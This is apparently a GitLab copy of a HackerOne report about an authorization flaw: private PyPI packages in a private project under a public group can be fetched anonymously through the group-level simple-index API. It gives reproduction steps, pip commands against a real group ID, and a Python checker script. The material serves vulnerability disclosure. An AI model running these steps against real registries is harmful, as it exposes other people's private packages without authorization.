Unauthenticated users can access private PyPI packages that belong to a public group using /api/v4/groups/{id}/-/packages/pypi/simple
HackerOne report #2035173 by js_noob
on 2023-06-22, assigned to @ottilia_westerlund:
Report
Summary
Hello team, as known, when a package registry belongs to a private group and the Package registry is turned off in the project settings, this should block every single user from accessing this project's package registries. However, if this project belongs to a public group, any unauthenticated user can access and download those packages.
Steps to reproduce
As an owner:
- Create a new public group
- Create a private project in that group, with the content in the following zip file
- After the project creation, change the content of pyproject.toml and add your name and email
- Verify that a pipeline is triggered
- Wait a couple of minutes, then navigate to https://gitlab.com/GROUP/PROJECT/-/packages, and verify that a new package is created -- Now you can directly jump to step 9, or if you wanted to add another layer of security you can continue in order. But at this point, no external users should be able to access this package
- Navigate to the project settings https://gitlab.com/GROUP/PROJECT/edit and disable Package registry
- Let's try to fetch the package as the owner, on your PC terminal run (you can create PAT here https://gitlab.com/-/profile/personal_access_tokens)
pip install mypypipackage --index-url https://__token__:OWNER_ACCESS_TOKEN@gitlab.com/api/v4/projects/PROJECT_ID/packages/pypi/simple
- Verify that the owner can't access it. Ideally, if the owner can't, no one should be able to, right?
As an unauthenticated user:
- Navigate to https://gitlab.com/groups/GROUP/-/packages and verify that there are no packages you have access to
- Run the following command in your terminal
pip install mypypipackage --index-url https://__token__:nooo-tokennn@gitlab.com/api/v4/groups/GROUP_ID/-/packages/pypi/simple
- Verify that you can access that private package without using an access token, i.e. without being logged in
As a double check:
You can check my private packages at https://gitlab.com/groups/my-nice-group-new-version/-/packages, verify that you can't see any packages.
Run the following command and verify that you can download my private package
pip install mypypipackage --index-url https://__token__:nooo-tokennn@gitlab.com/api/v4/groups/68082643/-/packages/pypi/simple
Video/POC
bandicam_2023-06-22_20-40-23-327.mp4
Impact
Unauthenticated users can access private PyPI packages.
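The two pip commands above compare the project-level index (with the owner's token) against the group-level index (with no valid token). The script below automates that comparison with the standard library only; it is an added example, not part of the reporter's submission or of GitLab's code. It assumes the simple-index URLs are the report's index URLs with pip's usual `/<package>/` suffix appended, and that "blocked" means a 401/403/404 from the project endpoint while "leaked" means a 200 from the group endpoint whose HTML carries at least one file link. The `SAMPLE_INDEX` body and the `fake_fetch` helper are constructed test data so the logic can be exercised offline; `fetch_index` does the real HTTP calls.

```python
import base64
import sys
import urllib.error
import urllib.request
from html.parser import HTMLParser
from typing import Callable, Optional, Tuple

GITLAB_API = "https://gitlab.com/api/v4"  # base used in the report's commands

# Constructed sample of a PyPI "simple" index page as GitLab renders it
# (one <a> per uploaded file). Not a captured response; used for offline runs.
SAMPLE_INDEX = (
    '<html><body><h1>Links for mypypipackage</h1>'
    '<a href="https://gitlab.com/api/v4/groups/68082643/-/packages/pypi/files/'
    'abc123/mypypipackage-0.0.1.tar.gz#sha256=0123abcd">mypypipackage-0.0.1.tar.gz</a>'
    '</body></html>'
)


class _LinkParser(HTMLParser):
    """Collects the file name of every <a href> on a simple-index page."""

    def __init__(self) -> None:
        super().__init__()
        self.files: list = []

    def handle_starttag(self, tag, attrs):
        if tag != "a":
            return
        for name, value in attrs:
            if name == "href" and value:
                # strip path and the "#sha256=..." fragment pip uses for hashes
                self.files.append(value.rsplit("/", 1)[-1].split("#", 1)[0])


def parse_simple_index(body: str) -> list:
    parser = _LinkParser()
    parser.feed(body)
    return parser.files


def fetch_index(url: str, token: Optional[str] = None) -> Tuple[int, str]:
    """GET a simple-index URL; HTTP basic auth with __token__ when a token is given."""
    req = urllib.request.Request(url)
    if token:
        cred = base64.b64encode(f"__token__:{token}".encode()).decode()
        req.add_header("Authorization", f"Basic {cred}")
    try:
        with urllib.request.urlopen(req, timeout=15) as resp:
            return resp.status, resp.read().decode("utf-8", "replace")
    except urllib.error.HTTPError as err:
        return err.code, err.read().decode("utf-8", "replace")


def check_group_leak(project_id: str, group_id: str, package: str, token: str,
                     fetch: Callable[..., Tuple[int, str]] = fetch_index) -> dict:
    """Project index as owner vs. group index unauthenticated, for one package."""
    project_url = f"{GITLAB_API}/projects/{project_id}/packages/pypi/simple/{package}/"
    group_url = f"{GITLAB_API}/groups/{group_id}/-/packages/pypi/simple/{package}/"
    p_status, _ = fetch(project_url, token)
    g_status, g_body = fetch(group_url, None)
    group_files = parse_simple_index(g_body) if g_status == 200 else []
    return {
        "project_status": p_status,
        "group_status": g_status,
        "group_files": group_files,
        # the bug: owner is refused at project level, anonymous gets files at group level
        "leak": p_status in (401, 403, 404) and g_status == 200 and bool(group_files),
    }


def fake_fetch(url: str, token: Optional[str] = None) -> Tuple[int, str]:
    """Constructed responses reproducing the reported behaviour, for offline use."""
    if "/groups/" in url and token is None:
        return 200, SAMPLE_INDEX
    return 403, '{"message":"403 Forbidden"}'


if __name__ == "__main__":
    # usage: python check.py PROJECT_ID GROUP_ID PACKAGE OWNER_TOKEN
    if len(sys.argv) == 5:
        print(check_group_leak(*sys.argv[1:5]))
    else:
        print(check_group_leak("1", "2", "mypypipackage", "x", fetch=fake_fetch))
```

Run it with the real IDs and a project access token that can normally read the project's registry; a `leak: True` result means the group endpoint handed an anonymous client the file list that the project endpoint refused to the owner.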
Attachments
Warning: Attachments received through HackerOne, please exercise caution!
How To Reproduce
Please add reproducibility information to this section: